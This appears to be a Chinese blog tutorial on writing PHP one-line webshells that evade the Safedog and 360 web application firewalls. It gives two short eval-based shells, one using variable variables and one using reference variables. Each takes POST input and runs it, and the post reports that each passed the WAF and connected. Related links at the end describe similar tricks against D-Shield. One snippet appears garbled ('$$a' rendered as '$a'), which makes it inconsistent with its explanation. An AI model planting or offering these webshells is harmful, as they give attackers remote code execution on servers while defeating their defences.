繞過安全狗與360PHP一句話的編寫

2021-07-15 23:39:04 字數 1981 閱讀 9906

00x01

安全狗的確是讓人很頭痛,尤其是在上傳一句話或者寫入一句話的時候,會被安全狗攔截從而拿不下shell。

當然,安全狗是最簡單的一款waf,很容易就進行乙個繞過。

00x02

對於繞過安全狗跟360,我姿勢不多,但是卻很實用為以下兩種

1.#可變變數

2.#引用變數

00x03

##可變變數(菜刀可能報錯)

複製**

經常使用的人都知道,只是最簡單的一句話,不過任何waf與規則

我們先來加入需要的函式

<?php

$a='b';

$b=$_post['x'];

@eval($a);

複製**

我們先來測試下是否被殺

可以看見,是成功過了安全狗,我們來測試下連線

並且成功可以連線

**分析#

<?php  

$a='b';

$b=$_post['x'];

@eval($a);

?>

複製**

我們來看第二行**

$a='b';

複製**

知道可變變數的人應該都能看懂吧,第三行$$a中的$a是b,也可以這麼說$a替換成b。

繼續看第三行

$b=$_post['x'];

複製**

根據第一行知道$$a就是$b,$b用來接收post 提交的資料  

最後第四行

@eval($a);

複製**

執行$$a相當於執行了$a也就是$b. 最後,我們整合成一句話

<?php $a='b'; $b=$_post['x']; @eval($a);?>

複製** 總結

1#  可變變數比較靈活對於過狗也比較簡單

2#  不過d盾只適合安全狗與360針對性比較高

00x04

##引用變數

複製**

還是原始一句話,我先寫出寫好的**

<?php  

$a=$_post['x'];

$b=&$a;

@eval($b);

?>

複製**

我們繼續測試下是否被殺,

可以看見,一樣過了安全狗,我們繼續測試下是否可以連線

可以看見,已經連線上了,並且可以進行操作。

##**分析

<?php  

$a=$_post['x'];

$b=&$a;

@eval($b);

?>

複製**

我們來看第二行**

$a=$_post['x'];

複製**

$a用來接收post提交的資料  

繼續看第三行**

$b=&$a;

複製**

$b引用了$a的記憶體位址間接的相當於$b接收了post提交的資料

最後第四行**:

@eval($b);

複製**

執行$b。最後我們來整合成一句話

<?php $a=$_post['x']; $b=&$a; @eval($b);?>

複製**

總結(與可變變數一樣)

1#  可變變數比較靈活對於過狗也比較簡單

2#  不過d盾只適合安全狗與360針對性比較高

相關鏈結

繞過D盾的一句話

乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。新建test1.php eval post g 新建test2.php a post g eval a a 使用d盾 web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。那麼問題就出現在eval a a...

繞過D盾的一句話

乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。新建test1.php eval post g 新建test2.php a post g eval a a 使用d盾 web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。那麼問題就出現在eval a a...

分析某過狗一句話

這個一句話 不記得是 了,作者見諒。最近小菜在學習php,看到這個一句話就分析了下。a range 1,200 在0到200之間產生的隨機數組 b chr a 96 1 1 chr a 114 1 1 chr a 114 1 1 chr a 100 1 1 chr a 113 1 1 chr a 1...